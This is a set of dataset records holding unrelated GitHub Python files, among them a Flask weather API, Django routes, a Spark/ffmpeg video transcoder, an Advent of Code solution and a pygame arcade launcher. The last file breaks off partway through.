True\n","repo_name":"ajheilman/A-game-of-craps","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31288009677","text":"# Dependencies\nfrom flask import Flask, jsonify\nimport numpy as np\nfrom numpy.testing._private.utils import measure\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\n# Create engine\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Reflect database\nbase = automap_base()\nbase.prepare(engine, reflect = True)\n\n# Save table references\nmeasurement = base.classes.measurement\nstation = base.classes.station\n\n# Create session\nsession = Session(engine)\n\n# Start Flask\napp = Flask(__name__)\n\n# Flask routes\n@app.route(\"/\")\ndef home():\n # Gives all routes\n return(f\"Welcome to the Surfs Up index!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n\t\tf\"/api/v1.0/stations
\"\n\t\tf\"/api/v1.0/tobs
\"\n\t\tf\"/api/v1.0/()
\"\n\t\tf\"/api/v1.0(/)
\")\n # Convert the query results to a dictionary using date as the key and prcp as the value.\n # Return the JSON representation of your dictionary.\n\n # Create session\n # Store results\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n precip_results = session.query(measurement.date, measurement.tobs).order_by(measurement.date)\n\n # Store in dictionary\n date_precip = []\n for row in precip_results:\n dictionary = {}\n dictionary[\"date\"] = row.date\n dictionary[\"tobs\"] = row.tobs\n date_precip.append(dictionary)\n return jsonify(date_precip) \n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Return a JSON list of stations from the dataset.\n all_stations = session.query(station.station, station.name).all()\n\n station_list = list(all_stations)\n return jsonify(station_list)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Query the dates and temperature observations of the most active station for the last year of data.\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n tobs_query = session.query(measurement.date, measurement.tobs).filter(measurement.date >= year_ago).order_by(measurement.date).all()\n\n tobs_list = list(tobs_query)\n return jsonify(tobs_list)\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n # When given the start only, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\n start_query = session.query(measurement.date, func.min(measurement.tobs), func.max(measurement.tobs), func.avg(measurement.tobs)).filter(measurement.date >= start).group_by(measurement.date).all()\n\n start_query_list = list(start_query)\n return jsonify(start_query_list)\n\n@app.route(\"/api/v1.0(/)\")\ndef start_end_date(start, end):\n # When given the start and the end date, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\n start_end_query = session.query(measurement.date, func.min(measurement.tobs), func.max(measurement.tobs), func.avg(measurement.tobs)).filter(measurement.date >= start).filter(measurement.date <= end).group_by(measurement.date).all()\n\n start_end_list = list(start_end_query)\n return jsonify(start_query_list)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"kyle125t/sqlalchemy-challenge","sub_path":"Instructions and Code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5300314952","text":"from django.urls import path\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n #---------------- Home -------------\r\n path(\"\", login_required(HomeView.as_view()), name=\"home\"),\r\n path(\"logout/\", signout, name=\"logout\"),\r\n #---------------- Resources -------------\r\n path('projects/resources/', login_required(ResourceListView.as_view()), name='resources-list'),\r\n path('projects/resources/create/', login_required(ResourceCreateView.as_view()), name='resources-create'),\r\n path('projects/resources//update/', login_required(ResourceUpdateView.as_view()), name='resources-update'),\r\n path('projects/resources//delete/', login_required(ResourceDeleteView.as_view()), name='resources-delete'),\r\n #---------------- Categories -------------\r\n path('projects/categories/', login_required(CategoryListView.as_view()), name='categories-list'),\r\n path('projects/categories/create/', login_required(CategoryCreateView.as_view()), name='categories-create'),\r\n 
path('projects/categories/<int:pk>/update/', login_required(CategoryUpdateView.as_view()), name='categories-update'),\r\n    path('projects/categories/<int:pk>/delete/', login_required(CategoryDeleteView.as_view()), name='categories-delete'),\r\n    #---------------- Announcements -------------\r\n    path('projects/announcements/categories', login_required(AnnouncementCategoriesListView.as_view()), name='announcements-categories'),\r\n    path('projects/announcements/select', login_required(AnnouncementListView.as_view()), name='announcements-list'),\r\n    path('projects/announcements/create/', login_required(AnnouncementCreateView.as_view()), name='announcements-create'),\r\n    path('projects/announcements/<int:pk>/update/', login_required(AnnouncementUpdateView.as_view()), name='announcements-update'),\r\n    path('projects/announcements/<int:pk>/delete/', login_required(AnnouncementDeleteView.as_view()), name='announcements-delete'),\r\n    path('projects/announcements/<int:pk>/projects/', login_required(AnnouncementProjectListView.as_view()), name='announcementProjects-list'),\r\n    path('projects/announcements/<int:pk>/apply/', login_required(CreateAnnouncementProject.as_view()), name='announcementProjects-apply'),\r\n    path('projects/announcements/select_project', login_required(ProjectSelectView.as_view()), name='select-project'),\r\n    #---------------- Projects -------------\r\n    path('projects/project/create/', login_required(ProjectCreateView.as_view()), name='project-create'),\r\n    path('projects/project/list',login_required(ProjectListView.as_view()), name='projects_list'),\r\n    path(\"projects/project/create/<int:pk>/requirements\",login_required(Requirements2ProjectView.as_view()),name=\"project-create-requirements\"),\r\n    path(\"projects/project/create///requirements/delete\",login_required(requitements_delete),name=\"project-delete-requirements\"),\r\n    path(\"projects/project/create///requirements/edit\",login_required(RequirementsEditView.as_view()),name=\"project-edit-requirements\"),\r\n    #---------------- Company -------------\r\n    path('projects/company/create/',login_required(CompanyRegistration.as_view()),name = \"register_company\"),\r\n    path('projects/company/detail/',login_required(CompanyDetail.as_view()),name = \"company_detail\"),\r\n    path('projects/company/<int:pk>/update/',login_required(EditCompany.as_view()),name = \"edit_company\"),\r\n    path('projects/company/<int:pk>/delete/',login_required(CompanyDeleteView.as_view()),name = \"delete_company\"),\r\n    #---------------- User -------------\r\n    path('projects/user/detail/',login_required(UserDetail.as_view()),name = \"user_detail\"),\r\n    path('projects/user/<int:pk>/update/',login_required(UserUpdateView.as_view()),name = \"user-update\"),\r\n    #---------------- Donation --------------\r\n    path('projects/donations/<int:pk>/donations_list/', login_required(DonationListView.as_view()), name='donations-list'),\r\n    path('projects/donations/<int:pk>/create_donation/', login_required(DonationCreateView.as_view()), name='donation-create'),\r\n    #---------------- Binnacle -------------\r\n    path('projects/binnacle/create/', login_required(BinnacleCreateView.as_view()), name='binnacle-create'),\r\n    path('projects/binnacle/<int:pk>/update/', login_required(BinnacleUpdateView.as_view()), name='binnacle-update'),\r\n    path('projects/binnacle/<int:pk>/delete/', login_required(BinnacleDeleteView.as_view()), name='binnacle-delete'),\r\n    #---------------- Report -------------\r\n    path('projects/<int:pk>/donations/report/', login_required(DonacionesProjectReport.as_view()), 
name='report-generate'),\r\n]\r\n\r\n\r\n","repo_name":"ICESI-PI1/Knowledge-Project-Gr5","sub_path":"src/knowledge_project/apps/app_projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"789566997","text":"import yaml\n\nfrom .config_registry import registry\n\n# Add the script configurations to the configuration registry.\n\n# CCCamera Housekeeping configs\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"CCCamera\"\n cmd: \"setFilter\"\n parameters:\n name: \"r_03\"\n timeout: 45\n \"\"\"\n)\n\nregistry[\"cccamera_set_filter\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTMount Housekeeping configs\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTMount\"\n cmd: \"homeBothAxes\"\n \"\"\"\n)\n\nregistry[\"mtmount_home_both_axes\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTPtg park\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTPtg\"\n cmd: azElTarget\n parameters:\n targetName: Park position\n azDegs: 0\n elDegs: 80\n rotPA: 0\n \"\"\"\n)\n\nregistry[\"mtptg_park\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTPtg stop tracking\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTPtg\"\n cmd: stopTracking\n \"\"\"\n)\n\nregistry[\"mtptg_stop_tracking\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n","repo_name":"lsst-ts/ts_IntegrationTests","sub_path":"python/lsst/ts/IntegrationTests/configs/maintel_housekeeping_configs.py","file_name":"maintel_housekeeping_configs.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14657076609","text":"import itertools\r\n\r\nclass Link:\r\n\r\n newid = itertools.count()\r\n\r\n def __init__(self, transactions, quantity) -> None:\r\n\r\n self.id = next(Link.newid)\r\n self.transactions = sorted(transactions, key=lambda transaction: transaction.trans_type)\r\n self.quantity = quantity\r\n self.trans1 = self.transactions[0]\r\n self.trans2 = self.transactions[1]\r\n\r\n if self.trans1.unlinked_quantity < quantity or self.trans2.unlinked_quantity < quantity:\r\n raise ValueError(f\"Quantity of link [{quantity}] is greater than\\\r\n \\ntrans 1 Type [{self.trans1.trans_type}] [{self.trans1.symbol}] unlinked [{self.trans1.unlinked_quantity}]\\\r\n \\nor trans 2 Type [{self.trans2.trans_type}] [{self.trans2.symbol}] unlinked quantity [{self.trans2.unlinked_quantity}]\")\r\n\r\n if self.transactions[0].trans_type == 'buy' and self.transactions[1].trans_type == 'sell':\r\n self.buy = self.trans1\r\n self.sell = self.trans2\r\n \r\n elif self.transactions[0].trans_type == 'sell' and self.transactions[1].trans_type == 'buy':\r\n self.buy = self.trans2\r\n self.sell = self.trans1\r\n\r\n elif self.transactions[0].trans_type == 'receive' and self.transactions[1].trans_type == 'buy':\r\n self.buy = self.trans2\r\n self.receive = self.trans1\r\n\r\n elif self.transactions[0].trans_type == 'buy' and self.transactions[1].trans_type == 'receive':\r\n self.receive = self.trans2\r\n self.buy = self.trans1\r\n\r\n self.symbol = self.buy.symbol\r\n self.link_buy_price = (quantity * self.trans1.usd_spot)\r\n self.link_sell_price = (quantity * self.trans2.usd_spot)\r\n self.link_sell_date = self.trans2.time_stamp\r\n self.link_buy_date = self.trans1.time_stamp\r\n 
self.profit_loss = (self.link_sell_price - self.link_buy_price)\r\n\r\n\r\n def __hash__(self) -> int:\r\n return hash(tuple(self.transactions))\r\n\r\n def __str__(self) -> str:\r\n return f\"Name: [{self.transactions[0].name}] Trans Type [{self.transactions[0].trans_type}] Quantity [{self.transactions[0].quantity:.2f}]\\\r\n <-{self.quantity:.2f}-> \\\r\n Name: [{self.transactions[1].name}] Trans Type [{self.transactions[1].trans_type}] Quantity [{self.transactions[1].quantity:.2f}]\"\r\n\r\n def __repr__(self):\r\n return f\"Link ID: {self.id} Link Quantity: {self.quantity} Link Type: {self.symbol}\"\r\n\r\n\r\n @property\r\n def hodl_duration(self):\r\n hodl_time = self.sell.time_stamp - self.buy.time_stamp\r\n\r\n return hodl_time\r\n\r\n @property\r\n def proceeds(self):\r\n return self.quantity * self.sell.usd_spot\r\n\r\n @property\r\n def cost_basis(self):\r\n return self.quantity * self.buy.usd_spot\r\n\r\n def other_transaction(self, trans):\r\n if trans == self.trans1:\r\n return self.trans2.name\r\n else:\r\n return self.trans1.name\r\n\r\n\r\nif __name__ == '__main__':\r\n test_link = Link()","repo_name":"salexandert/Gainz","sub_path":"link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9941864287","text":"from django.contrib import admin\nfrom .models import PersonSet, Person, Settings\n\n\nclass PersonInline(admin.StackedInline):\n model = Person\n\n\nclass PersonSetAdmin(admin.ModelAdmin):\n model = PersonSet\n inlines = [PersonInline]\n\n\nadmin.site.register(PersonSet, PersonSetAdmin)\nadmin.site.register(Settings)\n","repo_name":"arnodeceuninck/GuessWho","sub_path":"guesswho/guesswho/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37743947712","text":"import pygame;\nfrom pygame.sprite import Sprite;\n\nclass Bullet(Sprite):\n\tdef __init__(self,screen,turret,tick):\n\t\tsuper(Bullet, self).__init__();\n\t\tself.screen = screen;\n\t\tself.screen_rect = self.screen.get_rect();\n\t\tself.image = pygame.image.load('./images/bullet.png');\n\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\tself.rect = self.image.get_rect();\n\t\tself.rect.centerx = turret.rect.centerx;\n\t\tself.rect.top = turret.rect.top + 50;\n\t\tself.turret = turret\n\t\tself.tick = tick;\n\t\tself.name = ''\n\n\t\tself.factory_row = turret.factory_row;\n\n\t\tself.x = self.rect.x+25;\n\t\tself.y = self.rect.y;\n\t\t\n\t\t#set a bullet type to each turret\n\t\tif turret.name=='gatling':\n\t\t\tself.image = pygame.image.load('./images/bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\t\tself.rect.top = turret.rect.top + 40;\n\t\telif turret.name=='double':\n\t\t\tself.image = pygame.image.load('./images/double_bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (40,30));\n\t\t\tself.rect.top = turret.rect.top + 40;\t\t\n\t\telif turret.name=='toxic':\n\t\t\tself.image = pygame.image.load('./images/toxic_bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\t\tself.name='super_bullet'\n\t\t\t\n\t#draws bullet\n\tdef draw_me(self):\n\t\tself.screen.blit(self.image,self.rect);\n\n\t#updates the bullet's positions\n\tdef update_me(self):\n\t\tself.x += 20 * 2;\n\t\tself.rect.x = self.x;\n\t\t\n\t\t#give the toxic turret its bullet spray ability\n\t\tif 
self.turret.name =='toxic':\n\t\t\tif self.tick % 3 ==1:\n\t\t\t\tself.rect.y += 5\n\t\t\telif self.tick % 3 ==2:\n\t\t\t\tself.rect.y -= 5\n\t\t\t# elif self.tick % 3 ==0:\t","repo_name":"CayaKnight/PythonProject","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70707992109","text":"'''\r\nCreated on Jan 10, 2016\r\n\r\n@author: SG0946321\r\n'''\r\nfrom com.sabre.api.sacs.workflow.SharedContext import SharedContext\r\n\r\nclass Workflow:\r\n \r\n def __init__(self, startActivity):\r\n self.startActivity = startActivity\r\n \r\n def runWorkflow(self):\r\n nextActivity = self.startActivity\r\n sharedContext = SharedContext()\r\n while nextActivity is not None:\r\n nextActivity = nextActivity.runActivity(sharedContext)\r\n \r\n return sharedContext","repo_name":"kl26/namei_group_sabre","sub_path":"SACS-Python-master/com/sabre/api/sacs/workflow/Workflow.py","file_name":"Workflow.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26639140914","text":"import numpy as np\nimport time\n\na=np.array([1,2,3,4])\nprint(a)\n\n\na=np.random.rand(10000000)\nprint(a.shape)\nb=np.random.rand(10000000)\ntic=time.time()\nc=np.dot(a,b)\ntoc=time.time()\nprint(c)\nprint(\"vectorized version: \"+str(1000*(toc-tic))+\"ms\")\n\nc=0\ntic=time.time()\nfor i in range(10000000):\n c+=a[i]*b[i]\ntoc=time.time()\nprint(c)\nprint(\"For loop: \"+str(1000*(toc-tic))+\"ms\")","repo_name":"HelloMX/deepLearning","sub_path":"deeplearning.ai/related_notes/course1/note1_vectorization1.py","file_name":"note1_vectorization1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21007526226","text":"import os\nimport subprocess\nfrom pyspark import SparkContext, SparkConf\n\ndef transcode_segment(args):\n input_file, start_time, segment_length, output_segment = args\n subprocess.run([\n \"ffmpeg\", \"-y\", \"-ss\", str(start_time), \"-t\", str(segment_length),\n \"-i\", input_file, \"-c:v\", \"libx265\", \"-c:a\", \"aac\", output_segment\n ], check=True)\n return output_segment\n\ninput_file = \"input_video.avi\"\noutput_file = \"output_video.mp4\"\nsegment_length = 10\nvideo_length = 2 * 60\nnum_segments = video_length // segment_length\n\n# Initialize Spark\nconf = SparkConf().setAppName(\"VideoProcessing\")\nsc = SparkContext(conf=conf)\n\n# Prepare the input data\ninput_data = [\n (input_file, i * segment_length, segment_length, f\"segment_{i:03d}.mp4\")\n for i in range(num_segments)\n]\n\n# Distribute the data and process it using Spark\nrdd = sc.parallelize(input_data)\nrdd.map(transcode_segment).collect()\n\n# Create a file with a list of segments\nwith open(\"segments_list.txt\", \"w\") as f:\n for i in range(num_segments):\n f.write(f\"file 'segment_{i:03d}.mp4'\\n\")\n\n# Concatenate the segments to create the final video\nsubprocess.run([\n \"ffmpeg\", \"-y\", \"-f\", \"concat\", \"-safe\", \"0\", \"-i\", \"segments_list.txt\",\n \"-c\", \"copy\", output_file\n], check=True)\n\n# Clean up temporary files\nfor i in range(num_segments):\n 
os.remove(f\"segment_{i:03d}.mp4\")\nos.remove(\"segments_list.txt\")\n","repo_name":"alexc-hollywood/video-segment-processing","sub_path":"python/spark/hevc_encoder.py","file_name":"hevc_encoder.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4188199166","text":"import pandas as pd\nimport numpy as np\nfrom typing import Tuple\n\n\nclass SplitDataFrame():\n \"\"\"\n Careful here, self.__data is stored as the transpose\n of the original data to ease computation.\n \"\"\"\n\n def __init__(self, data: pd.DataFrame, na_prop: int = 0.05):\n # Drop all the columns full of NAs. We do that because some\n # time series do not start on the same day so we do not want\n # to have columns full of NAs.\n # data = data.dropna(how='all', axis=1)\n self.data = data\n self.na_prop = na_prop\n self.__data['nb_na'] = self.__data.apply(SplitDataFrame.number_of_na_in_ts, axis=0)\n self.data = self.__data.sort_values(by=['nb_na']).drop(columns=['nb_na'])\n self.train, self.valid, self.extra_na_data = self.__split_train_valid()\n\n @property\n def data(self) -> pd.DataFrame:\n return self.__data.T\n\n @data.setter\n def data(self, value):\n self.__data = value\n\n def __split_train_valid(self, train_proportion: int = 0.8) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Returns a tuple in the form of :\n (\n {\n 'orignal': train data\n 'new': train data with new missing values\n },\n {\n 'original': validation data\n 'new': validation data with new missing values\n }\n )\n \"\"\"\n threshold = int(train_proportion * self.__data.shape[0])\n added_na = self.generate_more_nan(self.__data).T\n train = {\n 'original': self.__data.iloc[:, threshold:],\n 'new': added_na.iloc[:, threshold:]\n }\n valid = {\n 'original': self.__data.iloc[:, :threshold],\n 'new': added_na.iloc[:, :threshold]\n }\n return train, valid, added_na\n\n def generate_more_nan(self, data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Generates new missing values in the data, with a proportion of `na_proportion`\n \"\"\"\n n = data.shape[0] * data.shape[1]\n k = int(self.na_prop * n)\n mask = np.ones(n)\n mask[:k] = np.NaN\n np.random.shuffle(mask)\n mask = mask.reshape(data.shape)\n return data.multiply(mask)\n\n @staticmethod\n def number_of_na_in_ts(ts: pd.Series) -> int:\n \"\"\"\n Removes all the NaNs at the beginning (assume the first value is never \n missing), then counts the number of NaNs.\n See test below.\n \"\"\"\n index_first_non_na = ts.first_valid_index()\n ts = ts[index_first_non_na:]\n return ts.isna().sum()\n\n @staticmethod\n def df_to_string(df: pd.DataFrame, name: str) -> str:\n \"\"\"\n Displays relevant information about the DF\n \"\"\"\n return f\"{name} {df.shape} ({df.isna().sum().sum()} missing values) :\\n\" + df.head().__str__()\n\n def __str__(self) -> str:\n return \"\\n\".join([\n SplitDataFrame.df_to_string(self.data, \"Original data\"),\n SplitDataFrame.df_to_string(self.train['original'], \"Train original\"),\n SplitDataFrame.df_to_string(self.train['new'], \"Train new\"),\n SplitDataFrame.df_to_string(self.valid['original'], \"Valid original\"),\n SplitDataFrame.df_to_string(self.valid['new'], \"Valid new\")\n ])\n\n\nif __name__ == '__main__':\n # Writing quick tests here\n x = pd.Series([None, None, 1, 2, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 0\n x = pd.Series([None, None, 1, 2, None, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 1\n x = pd.Series([1, 2, 3])\n 
print(SplitDataFrame.number_of_na_in_ts(x)) # 0\n x = pd.Series([1, 2, None, 3])\n print(SplitDataFrame.number_of_na_in_ts(x)) # 1\n # Test for main function\n x = SplitDataFrame(pd.DataFrame(np.random.choice([1, np.NaN], size=(10, 10), p=[.95, .05])))\n print(x)\n","repo_name":"aichabokbot/missing_values_imputation","sub_path":"src/split_data_frame.py","file_name":"split_data_frame.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22320663176","text":"from utils.test import get_challenge_data, test_before_submit\nimport os\n\nAOC_SESSION = os.getenv(\"AOC_SESSION\") \nday=4\n\ndf = get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"])\n\ndef get_answers(df):\n df[\"First Start\"] = df[\"First Elf\"].str.split(\"-\").str[0].astype(int)\n df[\"First End\"] = df[\"First Elf\"].str.split(\"-\").str[1].astype(int)\n df[\"Second Start\"] = df[\"Second Elf\"].str.split(\"-\").str[0].astype(int)\n df[\"Second End\"] = df[\"Second Elf\"].str.split(\"-\").str[1].astype(int)\n\n df[\"between\"] = (df[\"Second Start\"].between(df[\"First Start\"],df[\"First End\"]) & df[\"Second End\"].between(df[\"First Start\"],df[\"First End\"])) | (df[\"First Start\"].between(df[\"Second Start\"],df[\"Second End\"]) & df[\"First End\"].between(df[\"Second Start\"],df[\"Second End\"]))\n\n df[\"overlap\"] = df[\"Second Start\"].between(df[\"First Start\"],df[\"First End\"]) | df[\"Second End\"].between(df[\"First Start\"],df[\"First End\"]) | df[\"First Start\"].between(df[\"Second Start\"],df[\"Second End\"]) | df[\"First End\"].between(df[\"Second Start\"],df[\"Second End\"])\n \n part_one = df[df[\"between\"]==True].count()[\"between\"]\n part_two = df[df[\"overlap\"]==True].count()[\"between\"]\n\n return part_one, part_two\n\ndef main():\n test_part_one,test_part_two = get_answers(get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"]))\n part_one,part_two = get_answers(get_challenge_data(day=day, column_name=[\"First Elf\",\"Second Elf\"], run_type=\"actual\"))\n\n if part_two and part_one:\n test_before_submit(day, part=\"b\", test_answer=test_part_two, answer=part_two)\n elif part_one:\n test_before_submit(day, part=\"a\", test_answer= test_part_one, answer=part_one)\n else:\n raise ValueError(\"Missing Answers\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"BethDataHub/Advent-of-code-2022","sub_path":"Day_4.py","file_name":"Day_4.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2223180972","text":"import os\nimport subprocess\nimport sys\nfrom enum import Enum\nfrom threading import Thread\nfrom typing import Any\n\n# Import non-standard modules\nimport pygame\nimport pygame_menu # https://pygame-menu.readthedocs.io/en/4.2.4/index.html\nimport pygame_menu.controls as ctrl\nfrom pygame.locals import *\n\npygame.init()\n\n# Initialize controller\njoysticks = []\nfor i in range(pygame.joystick.get_count()):\n joysticks.append(pygame.joystick.Joystick(i))\nfor joystick in joysticks:\n joystick.init()\nanalog_keys = {0: 0, 1: 0, 2: 0, 3: 0, 4: -1, 5: -1}\n\nfrom src import jadoor\nfrom src.jadoor.credit import Credit\n# Import class\nfrom src.misc import Misc\n\n\nclass View(Enum):\n LOGIN_MENU = 1\n SOLO_GAMES_LIST_MENU = 2\n DUO_GAMES_LIST_MENU = 3\n IN_GAME_MENU = 4\n\n\nclass User():\n\n def __init__(self, login):\n self.login = login\n\n\nclass 
Game():\n\n def __init__(self, name, config):\n self.name = name\n self.executablePath = config['EXECUTABLE_PATH']\n self.language = config['LANGUAGE']\n self.dependencies_script = config['DEPENDENCIES_SCRIPT']\n self.inputs = config['INPUTS']\n self.version = config['VERSION']\n self.modes = config['GAMEMODES']\n self.scoreboards = Misc.read_yaml(file_path=\"games/\" + self.name + \"/scoreboard.yaml\")\n\n def launch(self, mode, users, launcher):\n u = [user.login for user in users]\n process = subprocess.run(\n args=[mode, ''.join(u)],\n executable=\"./\" + self.executablePath,\n capture_output=True,\n cwd=\"games/\" + self.name + \"/\"\n )\n print(process)\n launcher.view = View.LOGIN_MENU\n\n\nclass Launcher:\n\n\n def __init__(self):\n self.view = View.LOGIN_MENU\n self.connectedUsers = [None]\n self.selectedGame = None\n self.availableGames = dict()\n self.logout_timer = 0\n self.jadoor = jadoor.JaDoor()\n self.credit = jadoor.credit.Credit()\n\n def __handleKeydown(self, event):\n if event.unicode == 's':\n self.view = View.SOLO_GAMES_LIST_MENU\n elif event.unicode == 'd':\n self.view = View.DUO_GAMES_LIST_MENU\n\n def __handlejoystick(self, event):\n if event.button == 8:\n self.view = View.SOLO_GAMES_LIST_MENU\n if event.button == 9:\n self.view = View.DUO_GAMES_LIST_MENU\n\n def __update(self, dt):\n events = pygame.event.get()\n\n currentView = self.view\n if self.view == View.LOGIN_MENU:\n self.loginMenu.update(events)\n elif self.view == View.SOLO_GAMES_LIST_MENU:\n self.soloGamesListMenu.update(events)\n elif self.view == View.DUO_GAMES_LIST_MENU:\n self.duoGamesListMenu.update(events)\n elif self.view == View.IN_GAME_MENU:\n self.inGameMenu.update(events)\n\n for event in events:\n if event.type == pygame.JOYBUTTONDOWN:\n self.__handlejoystick(event)\n elif event.type == pygame.KEYDOWN:\n self.__handleKeydown(event)\n\n def __draw(self, screen):\n screen.fill((0, 0, 0))\n\n # Redraw screen here.\n currentView = self.view\n if self.view == View.LOGIN_MENU:\n self.loginMenu.draw(screen)\n elif self.view == View.SOLO_GAMES_LIST_MENU:\n self.soloGamesListMenu.draw(screen)\n elif self.view == View.DUO_GAMES_LIST_MENU:\n self.duoGamesListMenu.draw(screen)\n elif self.view == View.IN_GAME_MENU:\n self.inGameMenu.draw(screen)\n\n pygame.display.flip()\n\n def __updateSoloScoreboard(self, selected: Any, value: int):\n for i in range(len(self.soloScoreboard._rows) - 1, 0, -1):\n self.soloScoreboard.remove_row(self.soloScoreboard._rows[i])\n scoreboard = selected[0][1].scoreboards['SOLO']\n if scoreboard:\n for i in range(len(scoreboard)):\n topColors = ['gold', 'silver', 'darkorange3']\n self.soloScoreboard.add_row([f'#{i + 1}', scoreboard[i]['username'], scoreboard[i]['score']], cell_font=self.arcadeFont20,\n cell_font_color=topColors[i] if i < 3 else 'white')\n else:\n self.soloScoreboard.add_row(['---', \"---\", \"---\"], cell_font=self.arcadeFont20, cell_font_color='white')\n self.soloScoreboard.update_cell_style(-1, -1, border_position=pygame_menu.locals.POSITION_NORTH)\n self.soloScoreboard.update_cell_style(-1, 1, font=self.arcadeFont40, border_width=0)\n\n def __launchSoloGame(self, selected: Any, value: int):\n if self.credit.check(self.connectedUsers[0].login) is False:\n return\n self.selectedGame = selected[0][1]\n self.view = View.IN_GAME_MENU\n t = Thread(target=self.selectedGame.launch, args=(\"solo\", self.connectedUsers, self))\n self.credit.consume(self.connectedUsers[0].login)\n t.start()\n\n def __launchDuoGame(self, selected: Any, value: int):\n if 
self.credit.check(self.connectedUsers[0].login) is False or self.credit.check(self.connectedUsers[1].login) is False:\n return\n self.selectedGame = selected[0][1]\n self.view = View.IN_GAME_MENU\n t = Thread(target=self.selectedGame.launch, args=(\"duo\", self.connectedUsers, self))\n self.credit.consume(self.connectedUsers[0].login)\n self.credit.consume(self.connectedUsers[1].login)\n t.start()\n\n def __getAvailablesGames(self, mode):\n ret = dict()\n for game in self.availableGames.values():\n if mode in game.modes:\n ret[game.name] = self.availableGames[game.name]\n return list(zip(ret.keys(), ret.values()))\n\n def __initComponents(self):\n # SHARED CONTENT\n self.menuBackground = pygame_menu.BaseImage(image_path=\"medias/arcade_bg.jpg\")\n self.arcadeFont20 = pygame_menu.font.get_font(\"medias/ArcadeFont.ttf\", 20)\n self.arcadeFont40 = pygame_menu.font.get_font(\"medias/ArcadeFont.ttf\", 40)\n mainTheme = pygame_menu.themes.THEME_DARK.copy()\n mainTheme.set_background_color_opacity(0.6)\n mainTheme.title_font = self.arcadeFont40\n mainTheme.widget_font = self.arcadeFont40\n\n # LOGIN MENU\n self.loginMenu = pygame_menu.Menu(title=\"Login\", width=1600, height=900, theme=mainTheme)\n loginMenuContent = \\\n \"Pull your student card out of your wallet\\n\" \\\n \"Place the card in front of the reader\\n\" \\\n \"Enjoy !\\n\"\n self.loginMenu.add.label(loginMenuContent, max_char=-1)\n\n # GAMES LIST MENU\n # SOLO\n self.soloGamesListMenu = pygame_menu.Menu(title=\"Games List (SOLO)\", width=1600, height=900, theme=mainTheme)\n if len(self.__getAvailablesGames(mode='solo')):\n self.soloGamesListMenu.add.label(\"Student login: None\", 'login_message')\n self.soloGamesListMenu.add.label(\"Credit state unknown\", 'credit_message')\n self.soloGamesListMenu.add.label(\"Logout in ? 
